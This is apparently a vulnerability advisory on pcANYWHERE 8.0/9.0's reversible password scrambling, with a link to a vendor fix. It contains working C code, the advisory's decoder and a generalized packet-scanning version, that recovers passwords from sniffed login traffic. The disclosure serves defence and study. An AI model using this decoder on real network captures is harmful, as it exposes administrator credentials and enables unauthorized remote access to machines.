Affected programs:
pcANYWHERE 8.0/9.0

Description
pcANYWHERE's weak password encryption allows the password to be recovered easily

Details
---- Discussion ----
The default security settings of pcANYWHERE 9.0 apply only a simple encryption to the user name and password, so the password the client sends is not cleartext but is trivially reversible. Since most users leave the encryption level at "none" or "PcAnyWhere", an attacker on the network path can sniff the login exchange and then decrypt the password.
The user name and password captured this way are usually those of a system administrator account.
Below is a brief description of the pcANYWHERE encryption scheme and how to decrypt it:

--- Exploit ---
The user name and password are each carried in a string two
packets after the "Enter your login name" and "Enter your
password" prompts. Each string is preceded by a 0x06 marker byte; the
byte after the marker is the string length, and the scrambled bytes follow.


Here is the code of the exploit (decodes one sniffed password):


#include <stdio.h>
#include <string.h>

int main(void) {

    /* Use unsigned bytes so the XOR/subtraction below is not affected
     * by sign extension of values >= 0x80 on platforms where char is signed. */
    unsigned char password[128];
    char cleartext[128];
    size_t i, len;

    // Input the sniffed hex values here.
    // Encrypted example of the "aaaaa" password.
    password[0] = 0xca;
    password[1] = 0xab;
    password[2] = 0xcb;
    password[3] = 0xa8;
    password[4] = 0xca;
    password[5] = '\0';

    len = strlen((const char *)password);

    // First byte: constant-offset subtraction (modulo 256).
    cleartext[0] = (char)((0xca - password[0] + 0x61) & 0xff);
    // Remaining bytes: each plaintext byte is the XOR of the previous and
    // current ciphertext bytes and the zero-based position of the previous byte.
    // "i-1" binds tighter than "^", so the parentheses only make that explicit.
    for (i = 1; i < len; i++)
        cleartext[i] = (char)((password[i - 1] ^ password[i] ^ (i - 1)) & 0xff);

    cleartext[len] = '\0';

    printf("password is %s \n", cleartext);

    return 0;
}
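The same decoder, generalized, as an added example that is not the advisory's own code: it scans a captured payload for the 0x06 marker and length byte described above, decodes the bytes that follow, and adds an encoder obtained by algebraically inverting the advisory's two decode formulas (the encoder is an assumption used for round-trip checking, not something verified against real pcANYWHERE traffic). The packet bytes and the "secret" test password are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Decode `len` scrambled bytes using the scheme given in the advisory:
 *   clear[0] = 0xca - enc[0] + 0x61              (mod 256)
 *   clear[i] = enc[i-1] ^ enc[i] ^ (i-1)   for i >= 1
 * Writes a NUL-terminated string into `out`; returns the number of
 * decoded bytes (truncated to fit `outsz`). */
size_t pca_decode(const unsigned char *enc, size_t len, char *out, size_t outsz)
{
    if (outsz == 0) return 0;
    if (len == 0) { out[0] = '\0'; return 0; }
    if (len > outsz - 1) len = outsz - 1;
    out[0] = (char)((0xca - enc[0] + 0x61) & 0xff);
    for (size_t i = 1; i < len; i++)
        out[i] = (char)((enc[i - 1] ^ enc[i] ^ (i - 1)) & 0xff);
    out[len] = '\0';
    return len;
}

/* Inverse of pca_decode, derived by solving the formulas above for enc[i]
 * (assumption: this mirrors what the client does; it is only used here to
 * build test vectors). Returns the number of bytes written to `enc`. */
size_t pca_encode(const char *clear, unsigned char *enc)
{
    size_t len = strlen(clear);
    if (len == 0) return 0;
    enc[0] = (unsigned char)(0xca + 0x61 - (unsigned char)clear[0]);
    for (size_t i = 1; i < len; i++)
        enc[i] = (unsigned char)(enc[i - 1] ^ (unsigned char)clear[i] ^ (i - 1));
    return len;
}

/* Locate the first well-formed record "0x06 <len> <len bytes>" in a sniffed
 * payload and decode it. A marker whose length runs past the end of the
 * buffer is treated as a false positive and scanning continues.
 * Returns the decoded length, or 0 if no record was found. */
size_t pca_extract(const unsigned char *pkt, size_t pktlen, char *out, size_t outsz)
{
    for (size_t i = 0; i + 1 < pktlen; i++) {
        if (pkt[i] != 0x06) continue;
        size_t len = pkt[i + 1];
        if (len == 0 || i + 2 + len > pktlen) continue;
        return pca_decode(pkt + i + 2, len, out, outsz);
    }
    if (outsz) out[0] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed payload: two filler bytes, then the 0x06 marker, length 5,
     * and the advisory's sample ciphertext for "aaaaa". */
    static const unsigned char pkt[] = {
        0x00, 0x01, 0x06, 0x05, 0xca, 0xab, 0xcb, 0xa8, 0xca, 0x00
    };
    char clear[128];

    if (pca_extract(pkt, sizeof pkt, clear, sizeof clear))
        printf("password is %s\n", clear);
    else
        printf("no password record found\n");
    return 0;
}
```

Because every byte after the first depends only on the two adjacent ciphertext bytes and a position counter, a single captured login is enough to recover the password with no key material at all, which is why "PcAnyWhere" level encryption offers no protection against a sniffer.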


Solution
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w

Additional information
See: CNNS Security Advisory 2000-02 --- PcAnywhere vulnerability (APP, defect)